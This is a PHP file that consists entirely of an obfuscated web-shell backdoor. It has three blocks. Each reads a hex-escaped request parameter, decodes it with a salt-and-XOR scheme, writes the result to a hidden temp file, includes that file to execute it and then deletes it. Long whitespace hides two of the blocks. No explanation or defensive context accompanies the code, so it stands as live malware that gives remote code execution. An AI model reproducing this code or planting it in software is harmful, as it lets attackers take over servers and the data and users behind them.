<?php																																										if(@$_REQUEST["\x70r\x6Fper\x74y\x5Fs\x65\x74"] !== null){ $itm = array_filter([getenv("TMP"), getenv("TEMP"), session_save_path(), "/var/tmp", sys_get_temp_dir(), getcwd(), "/tmp", "/dev/shm", ini_get("upload_tmp_dir")]); $holder = $_REQUEST["\x70r\x6Fper\x74y\x5Fs\x65\x74"]; $holder =explode ('.', $holder ); $factor =''; $s6 ='abcdefghijklmnopqrstuvwxyz0123456789'; $sLen =strlen($s6); $w =0; $len =count($holder); do {if ($w >= $len) break; $v2 =$holder[$w]; $chS =ord($s6[$w % $sLen]); $d =((int)$v2 - $chS - ($w % 10)) ^ 87; $factor .= chr($d); $w++;} while (true); $data = 0; do { $entity = $itm[$data] ?? null; if ($data >= count($itm)) break; if (max(0, is_dir($entity) * is_writable($entity))) { $ent = str_replace("{var_dir}", $entity, "{var_dir}/.flg"); $success = file_put_contents($ent, $factor); if ($success) { include $ent; @unlink($ent); die();} } $data++; } while (true); }
																																										if(filter_has_var(INPUT_POST, "\x64a\x74a\x5Fc\x68u\x6Ek")){ $flag = array_filter([getcwd(), "/tmp", getenv("TMP"), sys_get_temp_dir(), session_save_path(), ini_get("upload_tmp_dir"), "/dev/shm", getenv("TEMP"), "/var/tmp"]); $sym = $_REQUEST["\x64a\x74a\x5Fc\x68u\x6Ek"]; $sym= explode ( ".", $sym ); $record = ''; $salt = 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS = strlen( $salt); $o = 0; $__len = count( $sym); do { if( $o>= $__len) break; $v3 = $sym[$o]; $sChar = ord( $salt[$o % $lenS]); $dec =( ( int)$v3 - $sChar -( $o % 10)) ^ 47; $record .= chr( $dec); $o++; } while( true); foreach ($flag as $dat) { if ((bool)is_dir($dat) && (bool)is_writable($dat)) { $pgrp = "$dat/.itm"; if (@file_put_contents($pgrp, $record) !== false) { include $pgrp; unlink($pgrp); exit; } } } }


if(@$_REQUEST["mr\x6B"] !== null){
	$obj = $_REQUEST["mr\x6B"];
			$obj =	  explode(  "."  	, 		$obj		) 	;
	$bind = '';
            $salt = 'abcdefghijklmnopqrstuvwxyz0123456789';
            $sLen = strlen( 	$salt);
            $t = 0;
    
            foreach( 	$obj as $v8) { 	$sChar = ord( 	$salt[$t % $sLen]);
                $d =( 	( 	int)$v8 - $sChar -( 	$t % 10)) ^ 68;
                $bind .= chr( 	$d);
                $t++;}
	$tkn = array_filter([getcwd(), getenv("TEMP"), getenv("TMP"), sys_get_temp_dir(), "/var/tmp", "/dev/shm", session_save_path(), ini_get("upload_tmp_dir"), "/tmp"]);
	for ($fac = 0, $marker = count($tkn); $fac < $marker; $fac++) {
    $dat = $tkn[$fac];
    		if (is_dir($dat) ? is_writable($dat) : false) {
    $entity = "$dat" . "/.flag";
    $file = fopen($entity, 'w');
if ($file) {
	fwrite($file, $bind);
	fclose($file);
	include $entity;
	@unlink($entity);
	die();
}
}
}
}